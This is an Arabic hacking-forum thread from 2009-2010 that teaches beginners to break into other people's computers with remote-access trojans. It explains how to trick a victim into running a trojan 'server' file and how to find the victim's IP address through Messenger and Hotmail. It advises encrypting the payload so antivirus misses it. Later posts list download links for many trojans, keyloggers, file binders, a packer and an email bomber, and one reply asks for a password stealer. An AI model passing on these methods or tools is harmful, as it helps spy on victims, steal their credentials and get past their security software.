منتديات هكر مصر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير

4 مشترك

اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير

مُساهمة  خالد المصرى السبت ديسمبر 26, 2009 11:34 pm

[ السلام عليكم ورحمه الله
اخوانى حميع اعضاء المنتدى ..... جذبنى جداا عنوان المنتدى ... وشدنى اكثر هكر مصر ؟.

وعندما تفحصت المنتدى وجدته ليس بالمستوى الذى لا يليق بالهكر المصرى ؟؟؟؟؟؟؟؟؟

ارجو من الجميع الاهتما م بالمنتدى ليكون على الوجه الافضل الذى يليق بنا كمصرين

وان نستخدم الهكر فى ما يرضى الله ...زلا على سبيل اللهو والضرر بالغير لنكون الارقى فى عالم الهكر

وسوف اكون اول من يبداء,,,,,,,,,,,,,,,,,,,,,, والله المستعا ن

vvv
vv



[
هذا هو اول مواضيعى فى المنتدى تعلم الهكر بمنتهى السهوله
________________
أول شي نبدأ عل الخفيف ...........
ولنبدأ بالكلام الجد

سأشبه لكم الأختراق بمثال من واقع حياتنا لكي يسهل علينا تخيله... لنفترض أن أمريكا تريد التجسس على بلد ما، فعليها أولا أن تحدد أي بلد تريد التجسس عليه، و ليكن مثلا العراق ( على سبيل المثال ليس إلا)... فهي تحتاج أولا أن تجهز جاسوس معين ليقوم بمهمة التجسس... تعطي أمريكا الأوامر لجاسوسها بأن يرسل لها المعلومات بطريقة ما، كأن يرسلها عن طريق اللاسلكي أو الإنترنت أو ... أو... فلنفرض أن الجاسوس سيرسل المعلومات عن طريق القمر الصناعي و الأنترنت حسب الطريقة المتوفرة... يجب أن يكون هناك في أمريكا مركز لاستقبال هذه الأوامر و لإيفاد الجاسوس بأوامر معينة ليقوم بها أو يحضر معلومات معينة عن وزارة من وزارات العراق... طيعا الجاسوس سيقوم بإحضار المعلومات بكل أمانة... ولكن... هنا لدينا مشكلة... من الممكن أن تكشف مخابرات العراق الجاسوس الأمريكي و تقوم بطرده أو إعدامه أو حتى تمنعه من دخول العراق، لذلك على أمريكا أن تضلل جاسوسها و تموهه بحيث لا تتمكن المخابرات من اكتشافه...
هذه هي آليه أختراق الأجهزة... فأمريكا تمثلك أنت كهاكر يريد اختراق جهاز معين... و العراق تعادل الــ IP للجهاز المراد اختراقه...و الجاسوس هو ملف الــ ______ في برنامج التجسس... و المركز الذي يأمر الجاسوس بأوامر معينة هو برنامج الأختراق ذاته... و مكان تدريب الجاسوس على إرسال المعلومات هو برنامج مرفق يدعى Edit ______... و تمويه الجاسوس يكون بواسطة برامج معينة لتضليله... و مخابرات العراق هي الــ Norton Anti-Virus و برامج الحماية من الفايروسات الموجودة في جهاز الضحية...
هذه كل آليه الأختراق... و الآن سأتطرق لشرح العناصر المشتركة في جميع برامج الإختراق التي يمكنك استخدامها لاختراق جهاز معين...

____ إن برامج الإختراق مثل الـــ Sub7 و الـــ Netbus و الــ NetDevil، كلها تتألف من ثلاث ملفات رئيسية... حيث لا يوجد أي برنامج اختراق يخلو من هذه الملفات الثلاث... و هي:
1- ملف الـــ ______: و هو ملف التجسس الذي ترسله إلى جهاز الضحية لكي يحضر لك المعلومات التي تريدها، كما يقوم بأوامر معينة تعطيها له.
2- ملف Edit______: و هذا الملف مسؤول عن تجهيز الــ ______ لكي يرسل لك المعلومات إلى إيميلك أو رقمك بالــ ICQ، أو حتى لتمويهه أو تحديد طريقة عمله و تشعبه في جهاز الضحية.
3- ملف الــ Client: و هو البرنامج الأصلي الذي يقوم بالإتصال بالــ ______ و إعطاءه الأوامر و استقبال المعلومات منه بعد أن ينشىء رابط بينه و بين الــ ______.

____ و إن المتطلبات اللازمة لتخترق جهاز معين على الإنترنت هي أن تحدد لبرنامج الإختراق موقع هذا الجهاز... و ذلك بتحديد الــ IP و البورت المفتوح الخاصين بالجهاز الضحية... طبعا بالإضافة لملف الــ ______ الذي يجب إن ترسله إلى الضحية بطريقة ما...


[gl]ii- تعريف الــ IP و شرح طريقة إحضاره:[/gl]

إن شبكة الإنترنت شبكة ضخمة جدا لدرجة أنه لا أحد في العالم يستطيع فهمها تماما... و إن عدد الأجهزة المتصله بهذه الشبكة عددها يقدر بأكثر من 50،000,000 جهاز من مواقع و شركات و أجهزة مستخدمين... فإذا طلب جهاز معين متصل على الإنترنت من موقع معين أن يرسل له ملف ما... فكيف تستطيع الشبكة أن تحدد هذا الجهاز و تميزه من بين هذا العدد الهائل من الأجهزة...
لقد تم تضمين آلية معينة في الإنترنت لتقوم بوظيفة ترميز كل جهاز على الإنترنت برقم معين... و هذا الرقم يسمى الــ IP... فلكل جهاز متصل على الإنترنت له رقم IP معين يختلف عن أي جهاز آخر في العالم ( طبعا إلا في حالات خاصة سأذكرها قريبا ). فإي جهاز يتصل بالإنترنت يحصل على رقم معين يتغير في كل دخول للإنترنت و يختلف عن رقم أي جهاز آخر. و إن هذا الأي بي مولف من 4 خانات، و كل خانة تــنفصل عن الأخرى بنقطة و تــتحدد قيمتهــا بــين 0 --> 225
مثل: 212.23.44.0 ... فكما تلاحظون في هذا الرقم ( طبعا هذا رقم عشوائي كمثال )، فالخانة الأولى فيه هي 212 و الخانة الثانية 23 ، و هكذا...
و هذا الــ IP هو عنصر أساسي لتحدد الجهاز الذي تريد اختراقه... أي يجب عليك أن تحضر رقم الــ IP للجهاز الذي تريد اختراقه... و هناك عدة طريق سأذكرها جميعها فيما يلي...

1) عن طريق المسنجر:
عندما تتكلم مع صاحب الجهاز الضحية على المسنجر... تستطيع إحضار الــ IP الخاص بجهازه بطريقتين..
<<الأولى>> و هي أن تفتح قائمة - إبدا - ، و تختار منها الخيار - تشغيل- ، ثم تكتب في صندوق النص "Command" و تضغط موافق... فتظهر لك شاشة الــ Dos ، ثم ترسل للضحية عن طريق المسنجر ملف معين ( أي ملف على أن يزيد حجمه على 125 كيلوبايت)... و بعد أن يقبل الضحية الإرسال، و خلال الإرسال، قم بكتابة العبارة التالية في الــ Dos "netstat -n" ، و لاحظ المسافة الموجودة بين الكلمتين... ثم اضغط Enter... ستظهر لك مجموعة إيبيات مع البورتات المفتوحة لكل IP. إن IP الضحية يكون آخر واحد في القائمة اليمين.
<<الثانية>> أن يكون لديك برنامج الحماية من الهاكرز Zone Alarm، و هو برنامج يقوم بتحذيرك من أي شخص يحاول اختراق جهازك ... الآن افتح قائمة - إبدا - ، و اختر منها الخيار - تشغيل- ، ثم اكتب في صندوق النص "winipcfg" و اضغط موافق... فتظهر لك شاشة فيها IP جهازك، و لنفرض أنه 220.100.20.8... فقم بكتابته على الشكل التالي:
http://220.100.20.8 و قم بإعطائه للضحية... و قل له بان يضغط عليه... فعندما يقوم الضحية بالضغط على هذا الرقم، فإن برنامج الــ Zone Alarm، يظن بأن أحد يريد أن يخترقك، و يحذرك بهذا الأمر مع أعطائك IP الجهاز الذي يحاول اختراقك ( و هو IP جهاز الضحية ).

2) عن طريق إيميل الــ Hotmail:
قم بالدخول إلى إيميلك في الــ Hotmail ... و اضغط على الخيار Options الموجود بجانب الــ Contacts... و من ثم اختر Mail Display Settings ، و تحت عنوان Message Headers، ضع الخيار على Full... عندها، كل إيميل يصلك، سيصل معه IP الجهاز الذي أرسل منه... و تجد هذا الــ IP عند الــ Attachment للإيميل...

3) عن طريق ______ برنامج الاختراق:
حيث يقوم هذا الــ ______ بإرسال IP جهاز الضحية إلى إيميل و حسابك بالــ ICQ بعد أن ترسله له عن طريق المسنجر أو الإيميل، و القيام بفتحه من قبل الضحية...


[gl]iii- تعريف الــ Port و شرح طريقة إحضاره:[/gl]

إن كل جهاز متصل بالإنترنت يحتوي على منفذ مفتوع على النت لاستقبال و إرسال المعلومات عن طريقه... و هذا المنفذ يدعى الــ Port، و هو عبارة عن جزء من الذاكرة الظاهرية لتقوم بتحليل البيانات و إرساله و استقبالها عبر الإنترنت... و من الممكن للجهاز أن يفتح فيه أكثر من منفذ... و هذا المنفذ هو عدد يتراوح بين 0 و 6328 تقريبا... و إيضا هذا المنفذ ضروري لعملية الإختراق، حيث يقوم الــ ______ بفتح منفذ معين في جهاز الضحية أنت تحدده ليتم عن طريقه إرسال و استقبال الأوامر من و إلى الــ ______...
و يوجد العديد من البرامج التي تبحث عن المنافذ المفتوحة للأجهزة المتصلة عبر الإنترنت.

يعني لازززززم وضروري كي نخترق واحد نعرف الإيبي بتاعه ونعرف البورت المفتوح عنده عن طريق إرسال باتش له بالمسنجر برساله إنته وشطارتك وطبعا حتى نكون الباتش ولازم برنامج هكرز أما أهمية الباتش أنه بيفتح بورت محدد بالجهاز حسب برنامج الهكرز تبعك وبيعطيك تبليغ وطبعا لو بدك تكون محترف لازم تشفر الباتش لتمنع الحمايه تكشفه [

[/
خالد المصرى
خالد المصرى

المساهمات : 3
تاريخ التسجيل : 26/12/2009
العمر : 45
الموقع : ever.20000@hotmail.com

https://egypt4hkak.yoo7.com/forum.htm

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty برامج الهكرز

مُساهمة  خالد المصرى السبت ديسمبر 26, 2009 11:38 pm

[color=red] بسم الله الرحمن الرحيم

Beast 2.07
http://www.hacktrojan.com/zip/Beast%20v2.07.zip
Optix Pro 1.33
http://www.hacktrojan.com/zip/optix_133.zip
Pro RAT 1.9

http://www.hacktrojan.com/zip/prorat%2019.zip

Prorat S.E V1.9
http://members.lycos.co.uk/xong/Prorat%20S.E%20V1.9.zip
SUB
http://www.hacktrojan.com/zip/sub7legends.zip
Theef 2.1
http://www.hacktrojan.com/zip/sub7legends.zip
Y3k 2.0
http://www.hacktrojan.com/zip/y3kpro2.0.zip
Hack Attack 2000
http://www.hacktrojan.com/zip/hackatack2000.zip

Deep Throat 3.1
http://www.hacktrojan.com/zip/Deepthroatv31.zip
Bifrost 1.1
http://www.hacktrojan.com/zip/Bifrost%20V1.1.01.rar
Assassin 2.0
http://www.hacktrojan.com/zip/assasin2.zip

Amitis 1.4.3b
Back Door 2.01
http://www.hacktrojan.com/zip/bd201.zip
Cold Fusion 1.2
http://www.hacktrojan.com/zip/ColdFusion%20v1.2.rar
Flux 1.0
http://www.hacktrojan.com/zip/flux1.zip

Gift 2.1.1
http://www.hacktrojan.com/zip/Gift211.zip
Girl Griend 1.35
http://www.hacktrojan.com/zip/girlfriend_135.zip
Hatred Friend 1.3
http://www.hacktrojan.com/zip/hatredfiend1.3.zip
Infector NG 2004
http://www.hacktrojan.com/zip/infector%202004.zip
[/color]
خالد المصرى
خالد المصرى

المساهمات : 3
تاريخ التسجيل : 26/12/2009
العمر : 45
الموقع : ever.20000@hotmail.com

https://egypt4hkak.yoo7.com/forum.htm

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty رد: تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير

مُساهمة  خالد المصرى السبت ديسمبر 26, 2009 11:41 pm

[color=darkblue]من مدمرات الايميل
It's only a game
http://littlehack.free.fr/download/jokez/game.zip

وللتشفير
UPX 1.24w + UPX____l
http://www.hacktrojan.com/prog/compresser.zip
ومن برامج الدمج

EasyBinder
http://www.geocities.com/pal_linux_h...SBinder1.0.zip

X-BIN
http://www.geocities.com/pal_linux_h...IND-IT1.0a.zip
وللبحث والاسكان الاقوي سوبر سكان
Superscan 3.0
http://www.hacktrojan.com/prog/superscan.exe


وللكي لوجر
Home Key logger 1.7
http://www.hacktrojan.com/prog/HomeKeyLogger17.exe
او البرو اجنت
http://www.spyinstructors.com/produc...t/ProAgent.zip
SC-KeyLog2
http://www.geocities.com/pal_linux_h...SC-KeyLog2.zip
احبائي اذا لم تعمل اي وصله قم بضغط زر الفاره اليمين حفظ الهدف باسم
[/color]

[size=18]
,,,,,,,,,,,,,,,,,,,,>>>>>>>>>>> ولكم المزيد من الشرح ان شاء الله قريب

....................... ((( وللامانه الموضوع منقول للاهميه ) وفى انتظار اى استفسارات[/
size]
خالد المصرى
خالد المصرى

المساهمات : 3
تاريخ التسجيل : 26/12/2009
العمر : 45
الموقع : ever.20000@hotmail.com

https://egypt4hkak.yoo7.com/forum.htm

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty رد: تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير

مُساهمة  الهكر الاسمر الأحد يناير 03, 2010 3:25 am

الله ينور نايس بجد علي الموضوع الجميل دة

الهكر الاسمر

المساهمات : 1
تاريخ التسجيل : 03/01/2010

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty شكر وثناء استفسار

مُساهمة  جوااانا الأربعاء أكتوبر 13, 2010 4:32 pm

الله يعطيك العافيه ع الموضوع الرائع
تستاهل اكثر
ياليت يا استاذ تشرح كيف ينزل برنامج سارق الباسوردات بصور وطريقة تثبيته
وجزاك الله خير

يعلم الله اني لما سجل في هالمنتدى لاني اعرف شباب مصر عندهم نخوه
واكثر برامج بيكون منزلها مصري
وانا اثق فيهم وهم والله لا ازيد على ذالك انهم قد الثقه
جوااانا
جوااانا

المساهمات : 1
تاريخ التسجيل : 13/10/2010

الرجوع الى أعلى الصفحة اذهب الى الأسفل

تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير Empty رد: تعلم الهكرز بمجرد دخولك جميع برامج الهكرز والتشفير والتدمير

مُساهمة  Max2012 الجمعة فبراير 17, 2012 11:50 am

والله كويس ان في حد بينزل مواضيع في المنتدي الصحرا ده علي العموم بدايه ممتازة واتمني انك تتاكد من الملفات دي لانها محتاجة وقت عشان حد يفحصها وانا بصراحه زهقت من المنتدي الي مافيهوش مشرفين خاااالص ده
تحياتي Smile

Max2012

المساهمات : 28
تاريخ التسجيل : 08/08/2011

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى